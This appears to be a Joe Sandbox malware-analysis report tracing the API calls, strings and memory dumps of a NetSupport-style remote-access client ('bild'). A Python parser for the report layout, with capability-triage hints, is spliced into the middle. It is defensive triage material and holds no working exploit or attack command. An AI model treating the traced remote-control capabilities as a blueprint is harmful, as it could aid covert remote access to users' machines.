                                                                                        • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                      • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,4012B9B4,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                      • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                      • _calloc.LIBCMT ref: 1100B3E9
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                      • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                      Strings
                                                                                      • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                      • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                      • DisableSounds, xrefs: 1100B342
                                                                                      • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                      • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                      • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                      • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                      • Audio, xrefs: 1100B347
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                      • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                      • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                      • _memset.LIBCMT ref: 111253E5
                                                                                      • CoUninitialize.OLE32 ref: 11125499
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                      • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                      APIs
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                      • _fgets.LIBCMT ref: 1102B3C0
                                                                                      • _strtok.LIBCMT ref: 1102B3E8
                                                                                        • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                      • _fgets.LIBCMT ref: 1102B424
                                                                                      • _strtok.LIBCMT ref: 1102B438
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                      • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      APIs
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,4012B9B4,00000000,00000000,00000000), ref: 1103119A
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                      • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                        • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                        • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                        • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                        • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                      • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,4012B9B4,111F00F8,111E5C98,?), ref: 110B3594
                                                                                      • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                      • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                      APIs
                                                                                        • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                        • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                        • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                      • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                      • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                      • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                      • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                      • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                      • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                      • String ID: AddToJournal$Chat
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                      • PostMessageA.USER32(0002046E,00000501,00000000,00000000), ref: 11027340
                                                                                      • SetEvent.KERNEL32(0000027C), ref: 11027351
                                                                                      • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                      • PostMessageA.USER32(0002046E,00000800,00000000,00000000), ref: 1102738E
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                      • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                      • CloseHandle.KERNEL32(000003F8), ref: 11027415
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                      • String ID: Async
                                                                                      • API String ID: 3276504616-2933828738
                                                                                      • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                      • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                      • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                      • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110534D
                                                                                      • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                      • GetTickCount.KERNEL32 ref: 1110535C
                                                                                      • GetTickCount.KERNEL32 ref: 1110538E
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                      • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                      • GetTickCount.KERNEL32 ref: 111053EC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                      • API String ID: 831250470-625438208
                                                                                      • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                      • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                      • API String ID: 2111968516-2092292787
                                                                                      • Opcode ID: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                      • Instruction ID: d9a7d6ebd96fccb3ef7d6a30ae0c52648c54e2eaa592bb8290d406d227b44d1e
                                                                                      • Opcode Fuzzy Hash: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                      • Instruction Fuzzy Hash: B7F0623269520C47BA8087EC784053EF78D739217D7C88093F4ACFAF20E916DCA0A1A9
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                      • _memset.LIBCMT ref: 111373D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc$Version_memset
                                                                                      • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                      • API String ID: 1659045089-3162170060
                                                                                      • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                      • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                      • _memset.LIBCMT ref: 11039131
                                                                                      • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                      • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                      • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                      • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                      • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                      • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                        • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                        • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3085755443-3916222277
                                                                                      • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                      • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
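The blocks above repeat one layout per analysed function: an "APIs" list (direct calls plus "Part of subcall function" lines), a "Strings" heading, the memory-dump provenance, and a "Similarity" section with the "String ID", "Opcode ID" and fuzzy-hash fields. The following parser is an added example for reading that layout, not Joe Sandbox code or part of this report. It pulls the direct calls, the subcall addresses and the "$"-separated String IDs out of each block and applies a small set of triage hints. The hint table is my own assumption, not a Joe Sandbox signature list, and the embedded sample is constructed from three blocks cut down to a few lines each.

```python
"""Parse the per-function blocks ("APIs", "Strings", "Similarity", ...) that Joe Sandbox
emits for each analysed function. Added example for this report layout, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One call line; covers "Name.MODULE(args), ref: ADDR", "Name.MODULE ref: ADDR" and
# "Part of subcall function PARENT: Name.MODULE ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Metadata lines ("• String ID: Async", "• Opcode ID: 7f34..."); also swallows the
# "• Associated: ...sdmpDownload File" lines, whose suffix is link-label residue.
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address
    parent: Optional[str] = None  # set on "Part of subcall function" lines

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_apis(self) -> List[str]:
        return [c.name for c in self.calls if c.parent is None]

    def string_ids(self) -> List[str]:
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_blocks(text: str) -> List[FunctionBlock]:
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":      # every function block opens with this heading
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = KV_RE.match(line)
        if m:
            current.meta[m["key"]] = m["value"]
    return blocks

# Triage heuristics of my own (an assumption, not a Joe Sandbox signature list):
# a hint fires when all APIs in its set appear as direct calls of one function.
HINTS = {
    "switches the calling thread's desktop": {"GetThreadDesktop", "SetThreadDesktop"},
    "resolves APIs at run time": {"GetModuleHandleA", "GetProcAddress"},
    "reads dialog input fields": {"GetDlgItemTextA"},
    "measures lock hold time": {"GetTickCount", "EnterCriticalSection", "LeaveCriticalSection"},
}

def capability_hints(block: FunctionBlock) -> List[str]:
    hints = [label for label, needed in HINTS.items() if needed <= set(block.direct_apis())]
    # VerifyVersionInfoA appears only as a GetProcAddress argument, so check the strings too.
    if "VerifyVersionInfoA" in block.string_ids():
        hints.append("gates behaviour on the OS version")
    return sorted(hints)

def summarize(text: str) -> List[dict]:
    return [{"entry": b.calls[0].ref if b.calls else None,
             "apis": b.direct_apis(),
             "subcalls": sorted({c.parent for c in b.calls if c.parent}),
             "strings": b.string_ids(),
             "opcode_id": b.meta.get("Opcode ID"),
             "hints": capability_hints(b)} for b in parse_blocks(text)]

# Constructed sample: three blocks cut down from the report layout above.
SAMPLE = """\
APIs
• GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
• GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
• String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
• Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
APIs
• GetCurrentThreadId.KERNEL32 ref: 110273BA
• GetThreadDesktop.USER32(00000000), ref: 110273C1
• SetThreadDesktop.USER32(00000000), ref: 110273CA
• String ID: Async
APIs
• GetTickCount.KERNEL32 ref: 1110534D
• EnterCriticalSection.KERNEL32(111F060C,?,00000000), ref: 11105356
• LeaveCriticalSection.KERNEL32(111F060C,?,00000000), ref: 111053F5
• String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
"""
```

Run `summarize(open("report.txt").read())` on the saved text of a report to get one dict per function; the "entry" field is the first listed call-site address, which is what you search for in the IDA snapshot named under "Joe Sandbox IDA Plugin". The hint table only keys on direct calls, so APIs reached through a listed subcall (the `_malloc`/`wsprintfA`/`_memset` lines above) are kept in `calls` with their parent address but do not trigger a hint on their own.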
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 1106F397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                      Strings
                                                                                      Memory Dump Source
